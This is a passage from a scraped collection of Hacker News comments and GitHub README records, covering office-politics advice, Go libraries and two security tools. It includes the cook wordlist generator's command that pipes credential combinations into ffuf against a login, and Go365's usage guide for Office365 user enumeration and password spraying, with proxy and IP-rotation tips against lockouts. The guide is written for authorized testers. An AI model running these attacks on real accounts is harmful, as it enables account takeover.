monthPick one!Looking at this with interest as I've multiple projects on cloudflare now and in development.Well this isn\u2019t good. I\u2019m leading an effort to move some of our services and about a hundred domains over to Cloudflare.Given all of this I think we\u2019re going to have to push pause and see how this shakes out.I recently signed up to CloudFlare for their Yubi key deal that was still being advertised on their website. A week later I received an email saying only customers subscribed by a certain time could claim the offer.I asked them to delete my data or provide the Yubi offer and they did neither. So they sit in an email folder known as bad companies. Because my data has value and they lied to obtain it for their own gain (aka fraud).In Canada we have private prosecution/rules about falsely acquired data. Every bad story on HN puts me closer to opening that folder up and ensuring my data costs at least 100k.Enough is enough.I am pretty amazingly sure it is because of \"office politics.\" It's more than being a \"brown-noser.\"Probably 95% of people go into companies with zero idea of office politics. I sure didn't when I started.What I have found is that people either 1) say that they hate office politics so they ignore it, 2) they pick the wrong \"friends\"The first reasons is obvious why people don't get promoted.The second reason is that people look at work as an extension of their social life, instead of as a job. I'll go into this.One has to realize that a job is not for friendship, it is for work. If you had a billion dollars, you wouldn't even be in that job in the first place in order to make \"friends.\" Because it's a fucking job. Everyone you meet should be \"business associates.\" Now, I know someone is going to say, \"Yeah, but I met my best friend of 20 years at my first job.\" Every time. Well, all I can say is that this is NOT about you. So what if you did. I didn't. Many others don't. Again, this is about getting promotions, not about making friends. Make friends outside of work. It's just as easy. I don't care about how you make friends at work. It's immaterial. I'm trying to relate how to get promoted at a job and not talk about your social life. If you want to discuss that, let's start another completely different conversation on reddit or something.Probably the biggest mistake that many people starting a job will go into the job and the first person who comes up to them and is friendly is now a \"friend.\" And they get into that \"clique.\"What one should do is not to become \"friends\" with the first person friendly to them. I'm not saying you shouldn't be friendly to all, it is very important that one is friendly to everyone. No gossip, no backstabbing, none of that evil shit.So when you start a new job, look around. Figure shit out. Find out who the \"power-players\" are. This is not difficult if you are aware.Once you figure that out, then you develop deeper business relationships with those people, just like you would anyone else. You want visibility with them for long-term success.I've done this many times and have been plucked from obscurity. You start rising through the company fast, because first, everyone knows you are associated closely with powerful people and nobody wants to fuck with you, they want to be nice because they want you to say nice things about them to powerful people in the business. And if you get along with the powerful person, that person will start telling other powerful people about \"keep an eye on this person\" kinda shit, and they all become aware of you. It's how it works. It truly is.Now, if you piss off a powerful person at the start, probably can expect your career will be less than ideal at that company.As far as your immediate boss goes, you have to know exactly what they want and get it done. If they change your priorities every week, and you don't like that, too bad. You do what they say. End of story, your personal preferences are not important. The #1 goal is to get promoted out of there anyways, so it is just a temporary thing anyways. So that part of office politics \"brown-nosing\" is correct, but it is just one tactic in the overall goal, and a minor tactic at that.Another super tactic is to write and public speak. If you do this, you become an \"industry expert.\" It doesn't matter if you speak on arcane shit in your industry, or basic stuff, it is unimportant. The important part is to write and speak to the public. I know one guy that does public speaking a few times a week - to small and large groups. It doesn't matter.One time I spoke at a small group of 25 people in an obscure technical conference. As a speaker, everyone wants to talk to you after your talk and the meeting - it's almost always that way. Well, I was talking to some people, then at lunch I struck up a conversation and talking a while to some dude I didn't know. Well, he tells me he's like to talk some more later in a few weeks and to call him. He gave me his card and he was the CIO of a Fortune 500 company and I talked to him a little about it and he is at the head of a 10,000 person tech group. I asked him why he flew out for this small meeting and he said he was close with one of the other speakers there and so was going to hang out with him afterwards or something like that, I forget exactly.That was an anomoly and in no way did I expect it, but the point is that just by giving a public talks, you gain so much credibility. Same with publishing in some kind of online or offline publication/media in your industry. If you're in supply chain management and publish some article on supply chain management, your immediate boss and also the COO of the company will know, because 1, you let them know, and 2 - you publish and speak a lot so it is difficult to ignore and they will know you are an \"up and comer.\" You are an industry expert. Your public persona will rub off on your boss, the COO, and the company.Also, another byproduct of public speaking and public writing means you will always have job offers coming out your ass, no matter what field. The one guy I knew who did two speaking engagements a week got 3-5 job offers daily. He showed me the emails.I know everyone can understand what I wrote. And it is a template to success. I've used it many times and know it is true..The issue that most people have is the \"small talk\" part. There is a solution to that. The solution is just the exact same as anything else you've done in your life. If you are a programmer, you didn't pop out of your mother's womb writing code. You might joke that someone has, but in seriousness, nobody is born with all knowledge - it takes effort to learn.So in order to learn how to make small talk and to get along with people, one has to work at it, same as if a CPA had to learn double-entry accounting in university. Like a physician has to go to med school.If you don't want to do it because you hate it, then so be it. But if you want to get promoted, you best learn how to be social and communicative.There's a shitload of resources now that I didn't dream of when I started my career.https://www.youtube.com/results?search_query=how+do+i+make+s...https://www.youtube.com/results?search_query=how+do+i+not+be...https://duckduckgo.com/?q=how+do+i+play+office+politics&atb=...https://www.youtube.com/results?search_query=how+to+strike+u...https://duckduckgo.com/?q=how+do+i+make+small+talk&atb=v314-...https://duckduckgo.com/?q=how+do+i+not+be+socially+awkward&a...https://www.youtube.com/results?search_query=how+do+i+play+o...https://duckduckgo.com/?q=how+to+strike+up+a+conversation+wi....Don't just watch one or two videos and read one or two articles. Make a study out of it. Put as much time into it as you did whatever your occupation is.There are many techniques. Some will work for you, some won't. Write down those that you think will work. Do them, test them. You don't even have to do them at work. You can practice conversation techniques with your grocery store clerk, with the admitting person at your doctor's office, with anyone. Don't randomly talk, use the techniques and test them over and over. None should be by the seat of your pants conversations. It's the same with anything - learn programming the first time - you have to learn what a variable is, what a iteration/loop is. And do them over and over so that they are second nature. You don't just randomly write miscellaneous computer lines. There's a plan. One specific line of code has to come after another line of code.And again, you for sure don't have to be an asshole. I am always smiling and friendly to everyone, and sincerely so. I've always liked everyone where I work and think everyone has liked me. Sure, there's sometimes been a bit of friction, but because I'm nice all the time to everyone, and develop that reputation, they know it is not me just being a dick for being a dick's sake.All of the above has to do with larger companies - a few hundred or more people. If you're in a startup with 5 people, of course all of the above doesn't apply, which I think is self-evident. You know everyone.And, also, if you don't want to be promoted and want to just do what you do best, well this whole converation is pointless for you to read or comment on. It is for people who DO want to get promoted and rise in their company.\"Some people don't want to get promoted because it might be too much work.\"I wonder if this is really just the key reason here. Perhaps everything else here just revolves around that. e.g. people being defensive with feedback and not analyzing perf reviews because they don't actually want to grow.It's also worth contrasting internal promotion challenges with the silicon valley way - see recent HN article \"All start-ups are an act of desperation.\" If you have a better mouse trap, make it yourself and parlay it into getting your own team at the company or run it yourself. I see no need to wait around for corporate nonsense.The main reason you're not getting promoted is because it would cost the company money.A secondary reason is that promotions are usually at odds with maintaining your boss's position in the status hierarchy.> Maybe you're doing enough for your role. You need to take on more challenges and go above and beyond to get promoted\"Do extra work for free hoping you will be rewarded later.\"A workplace where you have to play the above games to get promoted... sounds like a workplace best avoided. To me, anyway.... Apparently many people enjoy such environments, or so they claim... or at least they get paid lots for putting up with it.I would say \"honesty is the best policy\" you should always talk to your boss and check if your wishes and capabilities/experience are aligned.Is there a tech analogy to be made?i forgot to mention but i also wrote a bash scriptYour sales pitch at the end made this truly a hackernews post. You've certainly learned a lot!I can't claim to be the representative of HN. However, you're welcome and thank you for sharing your joy. It reminds me of my own joy.Free software underpins much of your experience. Given your background, you may find it interesting to read about it: https://archive.org/details/free-software-free-society-selec...I'm also self-taught from another discipline. I'm a bottom-up learner and have found 'The Elements of Computing Systems' (aka Nand2Teris) compelling and exciting. With the course, you build a computer, completely, from scratch. It's some of the best writing and teaching I have ever experienced. It leaves you with a solid overview of computing and where you can go next with your learning, career, or projects. https://www.nand2tetris.org/You might think of these as the \"why\" and the \"how\".Hi,Just a small tip:Yes, configuring email and having your own email server can be a bit of a pain in the ass. But this might save you some money and do it all yourself while being pretty secure:1> Figure out how to use Docker / containerization on your VPS.2> Install Mailcow (https://mailcow.email/) on your VPS following these (https://docs.mailcow.email/) instructions. With a maximum of a few hours tinkering (depending on your requirements) you are pretty much done.Happy Christmas, and never stop learning :)", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "glitchedgitz/cook", "link": "https://github.com/glitchedgitz/cook", "tags": ["wordlist-generator", "password-generator", "advance-permutation", "wordlists", "predefined-sets", "pentest-tools", "bugbounty-tool"], "stars": 532, "description": "An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need. Frustation Killer!!!", "lang": "Go", "repo_lang": "", "readme": "\n\n# COOK\nAn overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need. \n\nFrustration killer! & Customizable!\n\n### Customizable\nCook is highly customizable and it depends on\n[cook-ingredients](https://github.com/glitchedgitz/cook-ingredients). Cook Ingredients consists YAML Collection of word-sets, extensions, funcitons to generate pattern and wordlists.\n\n### Installation\nUse Go or download [latest builds](https://github.com/glitchedgitz/cook/releases/) \n```\ngo install -v github.com/glitchedgitz/cook/v2/cmd/cook@latest\n```\n\n> After installation, run `cook` for one time, it will download [cook-ingredients](https://github.com/glitchedgitz/cook-ingredients) automatically at `%USERPROFILE%/cook-ingredients` for windows and `$home/cook-ingredients` for linux.\n\n# Basic\nWithout basics, everything is useless.\n\n\n## Parametric Approach\nYou can define your own params and use them to generate the pattern. This will be useful once you understand [methods](#methods)\n\n\n# Save wordlists and word sets\n\n\n### Search Wordlist\n```\ncook search keyword\n```\n\n## Reading File using Cook\nIf you want to use a file from current working directory. \nUse `:` after param name. \n```\ncook -f: live.txt f\n```\n\n# Methods\nMethods will let you apply diffenent sets of operation on final output or particular column as you want. You can encode, decode, reverse, split, sort, extract different part of urls and much more...\n\n- `-m/-method` to apply methods on the final output\n- `-mc/-methodcol` to apply column-wise.\n- `param.methodname` apply to any parameter-wise, will example this param thing later.\n- `param.md5.b64e` apply multiple methods, this will first md5 hash the value and then base64 encode the hashed value.\n\n\n\n\n
All methods\n\n```\nMETHODS\n Apply different sets of operations to your wordlists\n\nSTRING/LIST/JSON\n sort - Sort them\n sortu - Sort them with unique values only\n reverse - Reverse string\n split - split[char]\n splitindex - splitindex[char:index]\n replace - Replace All replace[this:tothis]\n leet - a->4, b->8, e->3 ...\n leet[0] or leet[1]\n json - Extract JSON field\n json[key] or json[key:subkey:sub-subkey]\n smart - Separate words with naming convensions\n redirectUri, redirect_uri, redirect-uri -> [redirect, uri]\n smartjoin - This will split the words from naming convensions &\n param.smartjoin[c,_] (case, join)\n redirect-uri, redirectUri, redirect_uri -> redirect_Uri\n\n u upper - Uppercase\n l lower - Lowercase\n t title - Titlecase\n\nURLS\n fb filebase - Extract filename from path or url\n s scheme - Extract http, https, gohper, ws, etc. from URL\n user - Extract username from url\n pass - Extract password from url\n h host - Extract host from url\n p port - Extract port from url\n ph path - Extract path from url\n f fragment - Extract fragment from url\n q query - Extract whole query from url\n k keys - Extract keys from url\n v values - Extract values from url\n d domain - Extract domain from url\n tld - Extract tld from url\n alldir - Extract all dirrectories from url's path\n sub subdomain - Extract subdomain from url\n allsubs - Extract subdomain from url\n\nENCODERS\n b64e b64encode - Base64 encoder\n hexe hexencode - Hex string encoder\n charcode - Give charcode encoding\n charcode[0] without semicolon\n charcode[1] with semicolon\n jsone jsonescape - JSON escape\n urle urlencode - URL encode reserved characters\n utf16 - UTF-16 encoder (Little Endian)\n utf16be - UTF-16 encoder (Big Endian)\n xmle xmlescape - XML escape\n urleall urlencodeall - URL encode all characters\n unicodee unicodeencodeall - Unicode escape string encode (all characters)\n\nDECODERS\n b64d b64decode - Base64 decoder\n hexd hexdecode - Hex string decoder\n jsonu jsonunescape - JSON unescape\n unicoded unicodedecode - Unicode escape string decode\n urld urldecode - URL decode\n xmlu xmlunescape - XML unescape\n\nHASHES\n md5 - MD5 sum\n sha1 - SHA1 checksum\n sha224 - SHA224 checksum\n sha256 - SHA256 checksum\n sha384 - SHA384 checksum\n sha512 - SHA512 checksum\n \n```\n
\n\n## Multiple Methods\nYou can apply multiple set of operations on partiocular column or final output in one command. So you don't have to re-run the tool again and again.\n\nTo understanding the usage, suppose you read a blog, consider this one https://blog.assetnote.io/2020/09/18/finding-hidden-files-folders-iis-bigquery/.\n\n```\ncook -z shub_zip_files z.json[path].fb.sortu.smartjoin[c:_]\n```\n\n\n\n# Direct fuzzing with FUFF\nYou can use generated output from cook directly with [ffuf](https://github.com/ffuf/ffuf) using pipe\n\n```\ncook usernames_list : passwords_list -m b64e | ffuf -u https://target.com -w - -H \"Authorization: Basic FUZZ\"\n```\n\nSimilarly you can fuzz directories/headers/params/numeric ids... And can apply required algorithms on your payloads.\n\n# Functions\n```\ncook -dob date[17,Sep,1994] elliot _,-, dob\n```\n\n\n> Customize: \n Create your own functions in `cook-ingredients/my.yaml` under functions:\n\n# Parsing Rules\n| | |\n|---|---|\n|Columns| Separated by space |\n|Values| Separated by comma |\n|Params| You can give param any name, use `-` before anything to make it param `-param value` |\n|Raw Strings| Use ` before and after the string to stop cook's parsing. Useful when you need to use any keyword as a word. |\n|Pipe Input| Take pipe input using `-` as value of any param. |\n|File Input| Use `:` after param name to take file input. `cook -f: live.txt f`|\n|Functions | Can be called using params only. |\n|Methods | Can be used on params or on final output |\n\n# Flags\n| Flag | Usage |\n|---|---|\n|-a, -append| Append to the previous lines, instead of permutations |\n|-c, -col| Print column numbers and there values |\n|-conf, -config| Config Information |\n|-mc, -methodcol| Apply methods column wise `-mc 0:md5,b64e; 1:reverse`
To all cols separate `-mc md5,b64e` |\n|-m, -method| Apply methods to final output |\n|-h, -help| Help |\n|-min | Minimum no of columns to print |\n\n### -append\nAppend line by line. So basically if you want to merge two lists line by line. Then use it. And as always you can append multiple columns using column\n \n\n### -min\n\n\n# Ranges\nSomething useful...\n\n\n# Repeat Operator\nYou can repeat a string horizontally or vertically.\n- Use `*` for horizontal repeating.\n- Use `**` for vertical repeating.\n- And try this `*10-1` or this `*1-10`.\n- Create Null Payloads and directly fuzz with fuff. `cook **100 | fuff ...`\n\n\n\n\n# Breaking Changes in veriosn v2.x.x\nVersion 1.6 and Version 2 have signifant breaking changes to improe the usability of the tool.\n\n- Previously columns was separated with colon. Now they are separated by space\n- Single cook.yaml file removed. Now there is folder.\n- URL support for yaml file and added sources with over 5500 wordlist sets.\n- File regex removed, now use .regex[] method for regex\n- Taking file input needs colon after param\n- -case flag removed, now you can use upper, lower and title\n- Added Methods\n- Removed charset and extensions, now they are in list\n- Simplyfied ranges\n\n# Contribute\n- Add wordlists, wordsets, functions, ports and other things in [cook-ingredients](https://github.com/glitchedgitz/cook-ingredients)\n- Making **raw string** works like as it works in programming languages. Means better parser.\n- I don't know, you might use your creativity and add some awesome features.\nOr you can [buy me a coffee](https://www.buymeacoffee.com/glitchedgitz)\u2615\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "campoy/go-web-workshop", "link": "https://github.com/campoy/go-web-workshop", "tags": ["golang", "appengine", "appengine-go", "workshop", "backend"], "stars": 532, "description": "Build Web Applications with Go on App Engine", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/campoy/go-web-workshop.svg)](https://travis-ci.org/campoy/go-web-workshop) [![Go Report Card](https://goreportcard.com/badge/github.com/campoy/go-web-workshop)](https://goreportcard.com/report/github.com/campoy/go-web-workshop)\n\n# Building Web Applications with Go\n\nWelcome, gopher! You're not a gopher?\nWell, this workshop is for gophers, or people that use the [Go programming language][1].\nBut fear not if you've never written any Go before!\nI'd recommend you learn the basics for the language first with the [Go tour][2].\n\nThis workshop has been run a couple of times with an instructor leading. The goal of\nthis repo is to make it as easy as possible for individuals to follow the content\nby themselves. If you get stuck at any point, feel free to file issues asking questions.\n\n## Setting up your workspace\n\nTo go through this you will need the following:\n\n1. You have installed the [Go Programming Language][1].\n1. You have set up a `GOPATH` by following the [How to Write Go Code][9] tutorial.\n1. You are somewhat familiar with the basics of Go. (The [Go Tour][2] is a pretty good place to start)\n1. You have a Google account and you have installed the [Google Cloud SDK][3].\n\n## Contents\n\nThere's a lot to say about how to build web applications, in Go or any other language.\nBut we only have one day so we won't try to cover too much.\nInstead we'll cover the basics, so you'll be able to explore other solutions and frameworks later.\n\nThe workshops is divided in eleven sections:\n\n- [0: Hello world](section00/README.md)\n- [1: Web Clients](section01/README.md)\n- [2: Web servers](section02/README.md)\n- [3: Input validation and status codes](section03/README.md)\n- [4: Deploying to App Engine](section04/README.md)\n- [5: Hello, HTML](section05/README.md)\n- [6: JSON encoding and decoding](section06/README.md)\n- [7: Durable storage with Cloud Datastore](section07/README.md)\n- [8: Retrieving remote resources with urlfetch](section08/README.md)\n- [9: What is Memcache and how to use it from App Engine](section09/README.md)\n- [10: Congratulations!](section10/README.md)\n\n## Resources\n\nThese are places where you can find more information for Go:\n\n- [golang.org](https://golang.org)\n- [godoc.org](https://godoc.org), where you can find the documentation for any package.\n- [The Go Programming Language Blog](https://blog.golang.org)\n\nMy favorite aspect of Go is its community, and you are now part of it too. Welcome!\n\nAs a newcomer to the Go community you might have questions or get blocked at some point.\nThis is completely normal, and we're here to help you.\nSome of the places where gophers tend to hang out are:\n\n- [The Go Forum](https://forum.golangbridge.org/)\n- #go-nuts IRC channel at [Freenode](https://freenode.net/)\n- Gophers\u2019 community on [Slack](https://gophers.slack.com/messages/general/) (signup [here](https://invite.slack.golangbridge.org/) for an account).\n- [@golang](https://twitter.com/golang) and [#golang](https://twitter.com/search?q=%23golang) on Twitter.\n- [Go+ community](https://plus.google.com/u/1/communities/114112804251407510571) on Google Plus.\n- [Go user meetups](https://go-meetups.appspot.com/)\n- golang-nuts [mailing list](https://groups.google.com/forum/?fromgroups#!forum/golang-nuts)\n- Go community [Wiki](https://github.com/golang/go/wiki)\n\n### Disclaimer\n\nThis is not an official Google product (experimental or otherwise), it is just\ncode that happens to be owned by Google.\n\n[1]: https://golang.org\n[2]: https://tour.golang.org\n[3]: https://cloud.google.com/sdk/downloads\n[9]: https://golang.org/doc/code.html#Organization\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RussellLuo/timingwheel", "link": "https://github.com/RussellLuo/timingwheel", "tags": ["go", "timer"], "stars": 532, "description": "Golang implementation of Hierarchical Timing Wheels.", "lang": "Go", "repo_lang": "", "readme": "# timingwheel\n\nGolang implementation of Hierarchical Timing Wheels.\n\n\n## Installation\n\n```bash\n$ go get -u github.com/RussellLuo/timingwheel\n```\n\n\n## Design\n\n`timingwheel` is ported from Kafka's [purgatory][1], which is designed based on [Hierarchical Timing Wheels][2].\n\n\u4e2d\u6587\u535a\u5ba2\uff1a[\u5c42\u7ea7\u65f6\u95f4\u8f6e\u7684 Golang \u5b9e\u73b0][3]\u3002\n\n\n## Documentation\n\nFor usage and examples see the [Godoc][4].\n\n\n## Benchmark\n\n```\n$ go test -bench=. -benchmem\ngoos: darwin\ngoarch: amd64\npkg: github.com/RussellLuo/timingwheel\nBenchmarkTimingWheel_StartStop/N-1m-8 5000000 329 ns/op 83 B/op 2 allocs/op\nBenchmarkTimingWheel_StartStop/N-5m-8 5000000 363 ns/op 95 B/op 2 allocs/op\nBenchmarkTimingWheel_StartStop/N-10m-8 5000000 440 ns/op 37 B/op 1 allocs/op\nBenchmarkStandardTimer_StartStop/N-1m-8 10000000 199 ns/op 64 B/op 1 allocs/op\nBenchmarkStandardTimer_StartStop/N-5m-8 2000000 644 ns/op 64 B/op 1 allocs/op\nBenchmarkStandardTimer_StartStop/N-10m-8 500000 2434 ns/op 64 B/op 1 allocs/op\nPASS\nok github.com/RussellLuo/timingwheel 116.977s\n```\n\n\n## License\n\n[MIT][5]\n\n\n[1]: https://www.confluent.io/blog/apache-kafka-purgatory-hierarchical-timing-wheels/\n[2]: http://www.cs.columbia.edu/~nahum/w6998/papers/ton97-timing-wheels.pdf\n[3]: http://russellluo.com/2018/10/golang-implementation-of-hierarchical-timing-wheels.html\n[4]: https://godoc.org/github.com/RussellLuo/timingwheel\n[5]: http://opensource.org/licenses/MIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "quii/mockingjay-server", "link": "https://github.com/quii/mockingjay-server", "tags": [], "stars": 532, "description": "Fake server, Consumer Driven Contracts and help with testing performance from one configuration file with zero system dependencies and no coding whatsoever", "lang": "Go", "repo_lang": "", "readme": "# mockingjay server\n\n[![Build Status](https://travis-ci.org/quii/mockingjay-server.svg?branch=master)](https://travis-ci.org/quii/mockingjay-server)[![Coverage Status](https://coveralls.io/repos/quii/mockingjay-server/badge.svg?branch=master)](https://coveralls.io/r/quii/mockingjay-server?branch=master)[![GoDoc](https://godoc.org/github.com/quii/mockingjay-server?status.svg)](https://godoc.org/github.com/quii/mockingjay-server)\n\n![mj example](http://i.imgur.com/ZtI1Q39.gif)\n\nMockingjay lets you define the contract between a consumer and producer and with just a configuration file you get:\n\n- A fast to launch fake server for your integration tests\n - Configurable to simulate the eratic nature of calling other services\n- [Consumer driven contracts (CDCs)](http://martinfowler.com/articles/consumerDrivenContracts.html) to run against your real downstream services.\n\n**Mockingjay makes it really easy to check your HTTP integration points**. It's fast, requires no coding and is better than other solutions because it will ensure your mock servers and real integration points are consistent so that you never have a green build but failing software.\n\n- [Installation](https://github.com/quii/mockingjay-server/wiki/Installing) - [Download a binary](https://github.com/quii/mockingjay-server/releases/latest), [use a Docker image](https://hub.docker.com/r/quii/mockingjay-server/) or `go get`\n- [Rationale](https://github.com/quii/mockingjay-server/wiki/Rationale)\n- [See how mockingjay can easily fit into your workflow to make integration testing really easy and robust](https://github.com/quii/mockingjay-server/wiki/Suggested-workflow)\n\n\n## Running a fake server\n\n````yaml\n---\n - name: My very important integration point\n request:\n uri: /hello\n method: POST\n body: \"Chris\" # * matches any body\n response:\n code: 200\n body: '{\"message\": \"hello, Chris\"}' # * matches any body\n headers:\n content-type: application/json\n\n# define as many as you need...\n````\n\n````bash\n$ mockingjay-server -config=example.yaml -port=1234 &\n2015/04/13 14:27:54 Serving 3 endpoints defined from example.yaml on port 1234\n$ curl http://localhost:1234/hello\n{\"message\": \"hello, world\"}\n````\n\n## Check configuration is compatible with a real server\n\n````bash\n$ mockingjay-server -config=example.yaml -realURL=http://some-real-api.com\n2015/04/13 21:06:06 Test endpoint (GET /hello) is incompatible with http://some-real-api - Couldn't reach real server\n2015/04/13 21:06:06 Test endpoint 2 (DELETE /world) is incompatible with http://some-real-api - Couldn't reach real server\n2015/04/13 21:06:06 Failing endpoint (POST /card) is incompatible with http://some-real-api - Couldn't reach real server\n2015/04/13 21:06:06 At least one endpoint was incompatible with the real URL supplied\n````\nThis ensures your integration test is working against a *reliable* fake.\n\n### Inspect what requests mockingjay has received\n\n http://{mockingjayhost}:{port}/requests\n\nCalling this will return you a JSON list of requests\n\n## Make your fake server flaky\n\nMockingjay has an annoying friend, a monkey. Given a monkey configuration you can make your fake service misbehave. This can be useful for performance tests where you want to simulate a more realistic scenario (i.e all integration points are painful).\n\n````yaml\n---\n# Writes a different body 50% of the time\n- body: \"This is wrong :( \"\n frequency: 0.5\n\n# Delays initial writing of response by a second 20% of the time\n- delay: 1000\n frequency: 0.2\n\n# Returns a 404 30% of the time\n- status: 404\n frequency: 0.3\n\n# Write 10,000,000 garbage bytes 9% of the time\n- garbage: 10000000\n frequency: 0.09\n````\n\n````bash\n$ mockingjay-server -config=examples/example.yaml -monkeyConfig=examples/monkey-business.yaml\n2015/04/17 14:19:53 Serving 3 endpoints defined from examples/example.yaml on port 9090\n2015/04/17 14:19:53 Monkey config loaded\n2015/04/17 14:19:53 50% of the time | Body: This is wrong :(\n2015/04/17 14:19:53 20% of the time | Delay: 1s\n2015/04/17 14:19:53 30% of the time | Status: 404\n2015/04/17 14:19:53 9% of the time | Garbage bytes: 10000000\n````\n\n## Building\n\n### Requirements\n\n- Go 1.3+ installed ($GOPATH set, et al)\n- golint https://github.com/golang/lint\n\n### Build application\n\n````bash\n$ go get github.com/quii/mockingjay-server\n$ cd $GOPATH/src/github.com/quii/mockingjay-server\n$ ./build.sh\n````\n\nMIT license\n", "readme_type": "markdown", "hn_comments": "This is a project born of my frustration of making fake servers and CDCs over and over again as we break our monolith into tiny pieces.I figured the requirements for both fake servers and CDCs in a lot of cases are the same. \"Given a request, i want this response\". So I thought, why not just define it once in configuration and be done with it. This stops the two things getting out of sync.The wiki has lots of info as to how to use it and what the point of it is. Would appreciate any feedback, apart from mean things.I've encountered the same frustration and created Dockpit (https://dockpit.io) as a solution; it uses Docker containers though.A genuine question, how is it differentiated from Stubby? http://stub.by/We use Pact[1], but the idea of flakeyness is interesting. Would you end up with non deterministic builds with the flakeyness? I imagine you could get enough 404's to trigger a Circuit Breaker in your application and this would propagate to tests sometimes failing.[1]: https://github.com/realestate-com-au/pact", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "optiv/Go365", "link": "https://github.com/optiv/Go365", "tags": [], "stars": 532, "description": "An Office365 User Attack Tool", "lang": "Go", "repo_lang": "", "readme": "# Go365 v2.0\n\n- Fixed AWS gateway issues (thanks h0useh3ad!)\n- No longer dies when proxy server connections fail\n- Added the graph endpoint\n\n**Please read all of this README before using Go365!**\n\nGo365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD Authentication and Authorization code. This code is then processed by Go365 and the result is printed to screen or an output file.\n\n\\* User enumeration is performed in conjunction with a password guess attempt. Thus, there is no specific flag or funtionality to perform only user enumeration. Instead, conduct your first password guessing attack, then parse the results for valid users.\n\n##### Read these three bullets!\n\n- This tool might not work on **all** domains that utilize o365. Tests show that it works with most federated domains. Some domains will only report valid users even if a valid password is also provided. Your results may vary!\n- The domains this tool was tested on showed that it did not actually lock out accounts after multiple password failures. Your results may vary!\n- This tool is intended to be used by security professionals that are authorized to \"attack\" the target organization's o365 instance.\n\n## Obtaining\n\n#### Option 0\n\nDownload a pre-compiled binary for your OS [HERE](https://github.com/optiv/Go365/releases).\n\n#### Option 1\n\nDownload the source and compile locally.\n\n1. Install Go.\n2. Clone the repo.\n3. Navigate to the repo and compile ya dingus.\n\n```\ngo build Go365.go\n```\n\n4. Run the resulting binary\n\n## Usage\n\n```\n$ ./Go365\n\n \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001 \u2001\u2001\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001 \u2588\u2588\n \u2588\u2588\u2001 \u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2001\u2001 \u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2001 \u2588\u2588\u2001\u2588\u2588\u2001 \u2588\u2588\u2001 \u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001\u2588\u2588\n\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\n\n Version: 2.0\n Authors: paveway3, h0useh3ad, S4R1N, EatonChips\n\nUsage:\n\n -h Shows this stuff\n\n\n Required - Endpoint:\n\n -endpoint [rst or graph] Specify which endpoint to use\n : (-endpoint rst) *Classic Go365!* login.microsoftonline.com/rst2.srf. SOAP XML request with XML response\n : (-endpoint graph) login.microsoft.com/common/oauth2/token. HTTP POST request with JSON Response\n\n Required - Usernames and Passwords:\n\n -u Single username to test\n : Username with or without \"@domain.com\"\n : Must also provide -d flag to specify the domain\n : (-u legitfirst.lastname@totesrealdomain.com)\n\n -ul Username list to use (overrides -u)\n : File should contain one username per line\n : Usernames can have \"@domain.com\"\n : If no domain is specified, the -d domain is used\n : (-ul ./usernamelist.txt)\n\n -p Password to attempt\n : Enclose in single quotes if it contains special characters\n : (-p password123) or (-p 'p@s$w0|2d')\n\n -pl Password list to use (overrides -p)\n : File should contain one password per line\n : -delay flag can be used to include a pause between each set of attempts\n : (-pl ./passwordlist.txt)\n\n -up Userpass list to use (overrides all the above options)\n : One username and password separated by a \":\" per line\n : Be careful of duplicate usernames!\n : (-up ./userpasslist.txt)\n\n Required/Optional - Domain:\n\n -d Domain to test\n : Use this if the username or username list does not include \"@targetcompany.com\"\n : (-d targetcompany.com)\n\n Optional:\n\n -w Time to wait between attempts in seconds.\n : Default: 1 second. 5 seconds recommended.\n : (-w 10)\n\n -delay Delay (in seconds) between sprays when using a password list.\n : Default: 60 minutes (3600 seconds) recommended.\n : (-delay 7200)\n\n -o Output file to write to\n : Will append if file exists, otherwise a file is created\n : (-o ./Go365output.out)\n\n -proxy Single SOCKS5 proxy server to use\n : IP address and Port separated by a \":\"\n : SOCKS5 proxy\n : (-proxy 127.0.0.1:1080)\n\n -proxyfile A file with a list of SOCKS5 proxy servers to use\n : IP address and Port separated by a \":\" on each line\n : Randomly selects a proxy server to use before each request\n : (-proxyfile ./proxyfile.txt)\n\n -url Endpoint to send requests to\n : Amazon API Gateway 'Invoke URL'\n : Highly recommended that you use this option. Google it, or\n : check this out: https://bigb0sss.github.io/posts/redteam-rotate-ip-aws-gateway/\n : (-url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login)\n\n -debug Debug mode.\n : Print xml response\n```\n\n### Examples\n\n```\n ./Go365 -endpoint rst -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com\n ./Go365 -endpoint graph -ul ./user_list.txt -p 'coolpasswordbro!123' 